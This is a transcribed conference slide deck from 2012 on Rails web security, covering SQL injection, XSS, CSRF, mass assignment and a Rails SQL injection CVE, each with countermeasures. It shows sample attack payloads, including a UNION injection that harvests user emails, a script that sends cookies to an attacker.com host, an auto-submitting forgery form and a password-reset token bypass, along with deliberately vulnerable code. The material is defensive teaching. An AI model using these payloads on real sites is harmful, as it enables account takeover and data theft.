Web Application Security in Rails

1,391 views

Published on

Talk I gave in RailsIsrael 2012 conference

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total views
1,391
On SlideShare
0
From Embeds
0
Number of Embeds
73
Actions
Shares
0
Downloads
12
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide
  • Can do defacement as well
  • Was also found at ThoughtBot clearance – Rails authentication gem
  • Web Application Security in Rails

    1. 1. WEB APPLICATIONSECURITY IN RAILS Uri Nativ RailsIsrael 2012
    2. 2. Uri Nativ @unativHead of Engineering Klarna Tel Aviv #railsisrael
    3. 3. Buy Now, Pay Later1.  Shop online2.  Receive your goods3.  Pay
    4. 4. Alice
    5. 5. Bob
    6. 6. Alice and Bob
    7. 7. Alice and Bob
    8. 8. Alice and Bob Like Duh?
    9. 9. Alice and Bob <html> <title> #$@# MicroBlogging %#@&*#$ </title> ...
    10. 10. Alice and Bob Hack it!
    11. 11. SQL INJECTION
    12. 12. SQL Injection@results = Micropost.where( "content LIKE %#{params[:query]%’”).allSELECT microposts.* FROM microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)
    13. 13. SQL InjectionSELECT microposts.* FROM microposts WHERE (content LIKE %SEARCHSTRING%) XXX) UNION SELECT 1, email, 1, 1, 1 FROM users --
    14. 14. SQL InjectionSELECT microposts.* FROM microposts WHERE (content LIKE %XXX)UNION SELECT 1, email, 1, 1, 1 FROM users -- %)
    15. 15. SQL InjectionSELECT microposts.* FROM microposts WHERE (content LIKE %XXX)UNION SELECT 1, email, 1, 1, 1 FROM users -- %)
    16. 16. SQL Injection - countermeasures@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”)).all
    17. 17. CROSS SITE XSSSCRIPTING
    18. 18. XSS<span class="content"> <%= raw feed_item.content %></span>
    19. 19. XSS<script> document.write(<img src= "http://www.attacker.com/x.png? + document.cookie + ’” >);</script>
    20. 20. XSS - countermeasures<span class="content"> <%= sanitize feed_item.content, :tags => [a’] %></span>
    21. 21. XSSThe Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as wellCountermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem)
    22. 22. CROSS CSRFSITEREQUESTFORGERY
    23. 23. CSRFwww.blog.com 1
    24. 24. CSRFwww.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> 2 Click here for free iPad
    25. 25. CSRFwww.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() 3 </script>
    26. 26. CSRFwww.blog.com www.freeiPad.com POST /blogpost <form name=“evilform” Content=“Kick Me!” action=“www.blog.com/….”> … <script> document.evilform.submit() 4 </script>
    27. 27. CSRF – Authenticity Token<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“/>
    28. 28. CSRFroutes.rbmatch /delete_post/:id, to: microposts#destroy
    29. 29. CSRFclass ApplicationController < ActionController::Base # commented to easily test forms # protect_from_forgery ...end
    30. 30. CSRFThe Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-inCountermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link
    31. 31. RAILS SPECIFICATTACKS
    32. 32. MASS boo[gotcha!]ASSIGNMENT
    33. 33. Mass Assignmentdef create @user = User.new(params[:user]) ...end
    34. 34. Mass Assignmentdef create @user = User.new(params[:user]) ...end { :name => “gotcha”, :admin => true }
    35. 35. Mass Assignment - countermeasuresBlacklistclass User < ActiveRecord::Base attr_protected :admin ...end
    36. 36. Mass Assignment - countermeasuresWhitelistclass User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...
    37. 37. Mass Assignment - countermeasuresGlobal Config (whitelist)config.active_record. whitelist_attributes = true
    38. 38. Mass AssignmentThe Attack: Unprotected by default :(Countermeasures: Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem
    39. 39. SQL INJECTIONVULNERABILITY INRUBY ON RAILS(CVE-2012-2661)
    40. 40. CVE-2012-2661 SQL InjectionUser.where( :id => params[:user_id], :reset_token => params[:token])SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ LIMIT 1
    41. 41. CVE-2012-2661 SQL Injection/users/6/password/edit?token[]SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
    42. 42. CVE-2012-2661 SQL InjectionThe Attack: SQL Injection - Affected version: Rails < 3.2.4Countermeasures: Upgrade to Rails 3.2.4 or higher
    43. 43. Brakeman-------------------------------------------------| Warning Type | Total |-------------------------------------------------| Cross Site Scripting |2 || Cross-Site Request Forgery | 1 || Denial of Service |1 || Redirect |1 || SQL Injection |4 |-------------------------------------------------
    44. 44. CONCLUSIONS
    45. 45. Make Love not War
    46. 46. ConclusionsKnow the threats – OWASP top 10Follow Rails conventionsRuby on Rails Security Guide http://guides.rubyonrails.org/security.htmlThe Ruby on Rails security project http://www.rorsecurity.infoRails security mailing list: http://groups.google.com/group/rubyonrails-security
    47. 47. Thanks to…Daniel Amselem for pair programmingIrit Shainzinger for the cool graphicsMichael Hartl for his microblogging app tutorial
    48. 48. Pay Online – Safer and Simplerhttps://github.com/unativ/sample_app

    ×